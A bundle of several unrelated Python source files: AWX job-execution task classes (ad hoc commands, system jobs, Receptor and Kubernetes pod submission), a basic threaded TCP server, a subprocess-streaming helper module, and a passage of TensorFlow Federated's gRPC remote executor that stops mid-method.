class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class TransmitterThread(threading.Thread):
def run(self):
self.exc = None
try:
super().run()
except Exception:
self.exc = sys.exc_info()
class AWXReceptorJob:
def __init__(self, task=None, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params['settings'].update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = ReceptorControl('/var/run/receptor/receptor.sock')
try:
return self._run_internal(receptor_ctl)
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
transmitter_thread = TransmitterThread(target=self.transmit, args=[sockin])
transmitter_thread.start()
# submit our work, passing
# in the right side of our socketpair for reading.
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params)
self.unit_id = result['unitid']
sockin.close()
sockout.close()
if transmitter_thread.exc:
raise transmitter_thread.exc[1].with_traceback(transmitter_thread.exc[2])
transmitter_thread.join()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# Which exits if the job has finished normally. The context manager ensures we do not
# leave any threads laying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
# TODO: There should be a more efficient way of getting this information
receptor_work_list = receptor_ctl.simple_command("work list")
detail = receptor_work_list[self.unit_id]['Detail']
state_name = receptor_work_list[self.unit_id]['StateName']
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
# If ansible-runner ran, but an error occured at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing, we
# write our payload to the left side of our socketpair.
@cleanup_new_process
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local':
self.runner_params['only_transmit_kwargs'] = True
try:
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
finally:
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
@cleanup_new_process
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
"pod_pending_timeout": getattr(settings, 'AWX_CONTAINER_GROUP_POD_PENDING_TIMEOUT', "5m"),
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
receptor_params = {"params": f"--private-data-dir={private_data_dir}"}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
work_type = 'kubernetes-runtime-auth'
else:
work_type = 'kubernetes-incluster-auth'
else:
work_type = 'local'
return work_type
@cleanup_new_process
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
if hasattr(self, 'unit_id') and 'RECEPTOR_UNIT_ID' not in self.task.instance.job_env:
self.task.instance.job_env['RECEPTOR_UNIT_ID'] = self.unit_id
self.task.update_model(self.task.instance.pk, job_env=self.task.instance.job_env)
time.sleep(1)
@property
def pod_definition(self):
if self.task and self.task.instance.execution_environment:
ee = self.task.instance.execution_environment
else:
ee = get_default_execution_environment()
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
# Enforce EE Pull Policy
pull_options = {"always": "Always", "missing": "IfNotPresent", "never": "Never"}
if self.task and self.task.instance.execution_environment:
if self.task.instance.execution_environment.pull:
pod_spec['spec']['containers'][0]['imagePullPolicy'] = pull_options[self.task.instance.execution_environment.pull]
if self.task and self.task.instance.is_container_group_task:
# If EE credential is passed, create an imagePullSecret
if self.task.instance.execution_environment and self.task.instance.execution_environment.credential:
# Create pull secret in k8s cluster based on ee cred
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
pm = PodManager(self.task.instance)
secret_name = pm.create_secret(job=self.task.instance)
# Inject secret name into podspec
pod_spec['spec']['imagePullSecrets'] = [{"name": secret_name}]
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"automation-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
|
tcp-server.py
|
# Basic socket tcp server
import socket
import sys
import threading
def main(host='localhost', port=2300):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
print(host, port)
s.bind((host, int(port)))
s.listen(10)
while 1:
client, addr = s.accept()
print('Connection from {}'.format(addr))
t = threading.Thread(target=handle_client, args=(client, addr))
t.start()
def handle_client(client, addr):
while 1:
try:
data = client.recv(1024)
if (len(data) != 0):
print('Data recv from {}: {}'.format(addr, data))
except:
client.close()
if __name__ == '__main__':
main(*sys.argv[1:])
|
subproc.py
|
"""
ttt.subproc
~~~~~~~~~~~~
This module provides additional functions for subprocess execution built on top
of the existing subprocess module.
:copyright: (c) yerejm
"""
import os
import subprocess
import sys
import threading
from six.moves import queue
def execute(*args, **kwargs):
"""Wrapper around subprocess.check_output where the universal newlines
option is enabled.
Otherwise, operates the same as that function.
"""
kwargs["universal_newlines"] = True
return subprocess.check_output(*args, **kwargs).splitlines()
def checked_call(*args, **kwargs):
"""Wrapper around subprocess.checked_call where the universal newlines
option is enabled.
Otherwise, operates the same as that function.
"""
kwargs["universal_newlines"] = True
return subprocess.check_call(*args, **kwargs)
def streamed_call(*args, **kwargs):
"""A subprocess.call where output can be sent to the caller in real time.
Arguments to subprocess.Popen are applicable to streamed_call with a few
differences.
To receive the lines of output, an object specified for the listener
keywork argument that must provide the interface fn(channel, message),
where channel is the where the message was sent (e.g. stdout, stderr), and
message is the line of output without the platform line end.
Due to the nature of this call, keywork arguments stdout and stdin cannot
be provided.
Universal newline handling is forced.
:param listener: (optional) an object that consumes the output from the
executing subprocess.
:return (process.returncode, stdout list, stderr list) tuple
"""
kwargs["universal_newlines"] = True
return call_output(*args, **kwargs)
#
# The following functions should not be used directly.
# They play with threads.
#
def call_output(*popenargs, **kwargs):
"""A custom version of subprocess.call_output() that operates in the same
way except it allows the optional provision of a callback that is called
for each line of output emitted by the subprocess.
"""
def create_process(*popenargs, **kwargs):
return subprocess.Popen(*popenargs, **kwargs)
if "stdout" in kwargs:
raise ValueError("stdout argument not allowed, it will be overridden.")
if "stdin" in kwargs:
raise ValueError("stdin argument not allowed, it will be overridden.")
kwargs["stdin"] = subprocess.PIPE
line_handler = kwargs.pop("listener", None)
with create_process(
*popenargs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs
) as process:
return run(process, line_handler)
def run(process, line_handler):
"""Maintains the process being executed in a subprocess until it ends.
Lines of output being emitted by the process are send to the lin handler if
any.
Communication between the process executing run() and the subprocess is
handled by threads reading from the stdout and stderr streams. Threads are
required to read the output as it is emitted by the subprocess in real-time
or else it would block until the subprocess had ended.
"""
io_q = queue.Queue(5)
threads = {
"stdout": threading.Thread(
target=read_stream, args=("stdout", process.stdout, io_q)
),
"stderr": threading.Thread(
target=read_stream, args=("stderr", process.stderr, io_q)
),
}
# Unfortunately, stdout and stderr are not synchronised with each other.
# This makes capturing both for real-time processing useless. So it is
# currently all captured under stdout. Even more unfortunately, stderr
# comes through first before stdout. This means writes that are made first
# to stdout will not be first through the pipe if there is stderr output.
#
# This lack of sychronisation between stdout and stderr output makes
# real-time display useless because they aren't captured and passed
# through to the handler as they are encountered.
#
# Worse still, there appear to be issues with subprocess output capture on
# Windows.
#
# A proper resolution would be to provide a custom subprocess module but
# since the common usage does not require real-time capture of
# stdout/stderr, this is not worth the effort. Manually running whatever
# was intended for the subprocess outside ttt is the only recourse.
#
for thread in threads.values():
thread.start()
stdout = []
stderr = []
while threads:
try:
item = io_q.get(True, 1)
except queue.Empty:
if process.poll() is not None:
break
else:
outstream, message = item
if message == "EXIT":
threads[outstream].join()
del threads[outstream]
else:
message = message.rstrip(os.linesep)
channel = sys.stdout if outstream == "stdout" else sys.stderr
(stdout if outstream == "stdout" else stderr).append(message)
if line_handler is not None:
line_handler(channel, message)
else:
channel.write(message)
channel.flush()
for t in threads.values():
t.join()
process.wait()
return (process.returncode, stdout, stderr)
def read_stream(stream_name, input_stream, io_q):
"""Captures lines incoming on the input stream on a queue.
This function is intended to be the function executed by a thread.
:param stream_name: the name of the stream being read
:param input_stream: the stream being read
:param io_q: the queue on to which lines from the input_stream are added.
It is intended to be a shared data structure between multiple threads of
execution (primarily between the main thread and the thread executing this
function).
"""
if not input_stream:
io_q.put((stream_name, "EXIT"))
return
for line in input_stream:
io_q.put((stream_name, line))
if not input_stream.closed:
input_stream.close()
io_q.put((stream_name, "EXIT"))
|
remote_executor.py
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A local proxy for a remote executor service hosted on a separate machine."""
import asyncio
import itertools
import queue
import threading
from typing import Mapping
import weakref
import absl.logging as logging
import grpc
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.proto.v0 import executor_pb2_grpc
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.common_libs import structure
from tensorflow_federated.python.common_libs import tracing
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.impl.executors import execution_context
from tensorflow_federated.python.core.impl.executors import executor_base
from tensorflow_federated.python.core.impl.executors import executor_service_utils
from tensorflow_federated.python.core.impl.executors import executor_value_base
from tensorflow_federated.python.core.impl.types import placement_literals
_STREAM_CLOSE_WAIT_SECONDS = 10
class RemoteValue(executor_value_base.ExecutorValue):
"""A reference to a value embedded in a remotely deployed executor service."""
def __init__(self, value_ref: executor_pb2.ValueRef, type_spec, executor):
"""Creates the value.
Args:
value_ref: An instance of `executor_pb2.ValueRef` returned by the remote
executor service.
type_spec: An instance of `computation_types.Type`.
executor: The executor that created this value.
"""
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
py_typecheck.check_type(type_spec, computation_types.Type)
py_typecheck.check_type(executor, RemoteExecutor)
self._value_ref = value_ref
self._type_signature = type_spec
self._executor = executor
# Clean up the value and the memory associated with it on the remote
# worker when no references to it remain.
def finalizer(value_ref, executor):
executor._dispose(value_ref) # pylint: disable=protected-access
weakref.finalize(self, finalizer, value_ref, executor)
@property
def type_signature(self):
return self._type_signature
@tracing.trace(span=True)
async def compute(self):
return await self._executor._compute(self._value_ref) # pylint: disable=protected-access
@property
def value_ref(self):
return self._value_ref
class _BidiStream:
"""A bidi stream connection to the Executor service's Execute method."""
def __init__(self, stub, thread_pool_executor):
self._stub = stub
self._thread_pool_executor = thread_pool_executor
self._is_initialized = False
def _lazy_init(self):
"""Lazily initialize the underlying gRPC stream."""
if self._is_initialized:
return
logging.debug('Initializing bidi stream')
self._request_queue = queue.Queue()
self._response_event_dict = {}
self._stream_closed_event = threading.Event()
def request_iter():
"""Iterator that blocks on the request Queue."""
for seq in itertools.count():
logging.debug('Request thread: blocking for next request')
val = self._request_queue.get()
if val:
py_typecheck.check_type(val[0], executor_pb2.ExecuteRequest)
py_typecheck.check_type(val[1], threading.Event)
req = val[0]
req.sequence_number = seq
logging.debug(
'Request thread: processing request of type %s, seq_no %s',
val[0].WhichOneof('request'), seq)
self._response_event_dict[seq] = val[1]
yield val[0]
else:
logging.debug(
'Request thread: Final request received. Stream will close.')
# None means we are done processing
return
response_iter = self._stub.Execute(request_iter())
def response_thread_fn():
"""Consumes response iter and exposes the value on corresponding Event."""
try:
logging.debug('Response thread: blocking for next response')
for response in response_iter:
logging.debug(
'Response thread: processing response of type %s, seq_no %s',
response.WhichOneof('response'), response.sequence_number)
# Get the corresponding response Event
response_event = self._response_event_dict[response.sequence_number]
# Attach the response as an attribute on the Event
response_event.response = response
response_event.set()
# Set the event indicating the stream has been closed
self._stream_closed_event.set()
except grpc.RpcError as error:
logging.exception('Error calling remote executor: %s', error)
response_thread = threading.Thread(target=response_thread_fn)
response_thread.daemon = True
response_thread.start()
self._is_initialized = True
@tracing.trace(span=True)
async def send_request(self, request):
"""Send a request on the bidi stream."""
self._lazy_init()
py_typecheck.check_type(request, executor_pb2.ExecuteRequest)
request_type = request.WhichOneof('request')
response_event = threading.Event()
# Enqueue a tuple of request and an Event used to return the response
self._request_queue.put((request, response_event))
await asyncio.get_event_loop().run_in_executor(self._thread_pool_executor,
response_event.wait)
response = response_event.response # pytype: disable=attribute-error
if isinstance(response, Exception):
raise response
py_typecheck.check_type(response, executor_pb2.ExecuteResponse)
response_type = response.WhichOneof('response')
if response_type != request_type:
raise ValueError('Request had type: {} but response had type: {}'.format(
request_type, response_type))
return response
def close(self):
if self._is_initialized:
logging.debug('Closing bidi stream')
self._request_queue.put(None)
# Wait for the stream to be closed
self._stream_closed_event.wait(_STREAM_CLOSE_WAIT_SECONDS)
else:
logging.debug('Closing unused bidi stream')
self._is_initialized = False
def _request(rpc_func, request):
with tracing.wrap_rpc_in_trace_context():
try:
return rpc_func(request)
except grpc.RpcError as e:
if _is_retryable_grpc_error(e):
logging.info('Received retryable gRPC error: %s', e)
raise execution_context.RetryableError(e)
else:
raise
def _is_retryable_grpc_error(error):
"""Predicate defining what is a retryable gRPC error."""
non_retryable_errors = {
grpc.StatusCode.INVALID_ARGUMENT,
grpc.StatusCode.NOT_FOUND,
grpc.StatusCode.ALREADY_EXISTS,
grpc.StatusCode.PERMISSION_DENIED,
grpc.StatusCode.FAILED_PRECONDITION,
grpc.StatusCode.ABORTED,
grpc.StatusCode.OUT_OF_RANGE,
grpc.StatusCode.UNIMPLEMENTED,
grpc.StatusCode.DATA_LOSS,
grpc.StatusCode.UNAUTHENTICATED,
}
return (isinstance(error, grpc.RpcError) and
error.code() not in non_retryable_errors)
class RemoteExecutor(executor_base.Executor):
"""The remote executor is a local proxy for a remote executor instance."""
# TODO(b/134543154): Switch to using an asynchronous gRPC client so we don't
# have to block on all those calls.
def __init__(self,
channel,
rpc_mode='REQUEST_REPLY',
thread_pool_executor=None,
dispose_batch_size=20):
"""Creates a remote executor.
Args:
channel: An instance of `grpc.Channel` to use for communication with the
remote executor service.
rpc_mode: Optional mode of calling the remote executor. Must be either
'REQUEST_REPLY' or 'STREAMING' (defaults to 'REQUEST_REPLY'). This
option will be removed after the request-reply interface is deprecated.
thread_pool_executor: Optional concurrent.futures.Executor used to wait
for the reply to a streaming RPC message. Uses the default Executor if
not specified.
dispose_batch_size: The batch size for requests to dispose of remote
worker values. Lower values will result in more requests to the remote
worker, but will result in values being cleaned up sooner and therefore
may result in lower memory usage on the remote worker.
"""
py_typecheck.check_type(channel, grpc.Channel)
py_typecheck.check_type(rpc_mode, str)
py_typecheck.check_type(dispose_batch_size, int)
if rpc_mode not in ['REQUEST_REPLY', 'STREAMING']:
raise ValueError('Invalid rpc_mode: {}'.format(rpc_mode))
logging.debug('Creating new ExecutorStub with RPC_MODE=%s', rpc_mode)
self._stub = executor_pb2_grpc.ExecutorStub(channel)
self._bidi_stream = None
self._dispose_batch_size = dispose_batch_size
self._dispose_request = executor_pb2.DisposeRequest()
if rpc_mode == 'STREAMING':
logging.debug('Creating Bidi stream')
self._bidi_stream = _BidiStream(self._stub, thread_pool_executor)
def close(self):
if self._bidi_stream is not None:
logging.debug('Closing bidi stream')
self._bidi_stream.close()
def _dispose(self, value_ref: executor_pb2.ValueRef):
"""Disposes of the remote value stored on the worker service."""
self._dispose_request.value_ref.append(value_ref)
if len(self._dispose_request.value_ref) < self._dispose_batch_size:
return
dispose_request = self._dispose_request
self._dispose_request = executor_pb2.DisposeRequest()
if self._bidi_stream is None:
_request(self._stub.Dispose, dispose_request)
else:
send_request_fut = self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(dispose=dispose_request))
# We don't care about the response, and so don't bother to await it.
# Just start it as a task so that it runs at some point.
asyncio.get_event_loop().create_task(send_request_fut)
@tracing.trace(span=True)
async def set_cardinalities(
self, cardinalities: Mapping[placement_literals.PlacementLiteral, int]):
serialized_cardinalities = executor_service_utils.serialize_cardinalities(
cardinalities)
request = executor_pb2.SetCardinalitiesRequest(
cardinalities=serialized_cardinalities)
if self._bidi_stream is None:
_request(self._stub.SetCardinalities, request)
else:
await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(set_cardinalities=request))
return
@tracing.trace(span=True)
async def create_value(self, value, type_spec=None):
@tracing.trace
def serialize_value():
return executor_service_utils.serialize_value(value, type_spec)
value_proto, type_spec = serialize_value()
create_value_request = executor_pb2.CreateValueRequest(value=value_proto)
if self._bidi_stream is None:
response = _request(self._stub.CreateValue, create_value_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_value=create_value_request)
)).create_value
py_typecheck.check_type(response, executor_pb2.CreateValueResponse)
return RemoteValue(response.value_ref, type_spec, self)
@tracing.trace(span=True)
async def create_call(self, comp, arg=None):
py_typecheck.check_type(comp, RemoteValue)
py_typecheck.check_type(comp.type_signature, computation_types.FunctionType)
if arg is not None:
py_typecheck.check_type(arg, RemoteValue)
create_call_request = executor_pb2.CreateCallRequest(
function_ref=comp.value_ref,
argument_ref=(arg.value_ref if arg is not None else None))
if self._bidi_stream is None:
response = _request(self._stub.CreateCall, create_call_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_call=create_call_request)
)).create_call
py_typecheck.check_type(response, executor_pb2.CreateCallResponse)
return RemoteValue(response.value_ref, comp.type_signature.result, self)
@tracing.trace(span=True)
async def create_struct(self, elements):
constructed_anon_tuple = structure.from_container(elements)
proto_elem = []
type_elem = []
for k, v in structure.iter_elements(constructed_anon_tuple):
py_typecheck.check_type(v, RemoteValue)
proto_elem.append(
executor_pb2.CreateStructRequest.Element(
name=(k if k else None), value_ref=v.value_ref))
type_elem.append((k, v.type_signature) if k else v.type_signature)
result_type = computation_types.StructType(type_elem)
request = executor_pb2.CreateStructRequest(element=proto_elem)
if self._bidi_stream is None:
response = _request(self._stub.CreateStruct, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_struct=request))).create_struct
py_typecheck.check_type(response, executor_pb2.CreateStructResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def create_selection(self, source, index=None, name=None):
py_typecheck.check_type(source, RemoteValue)
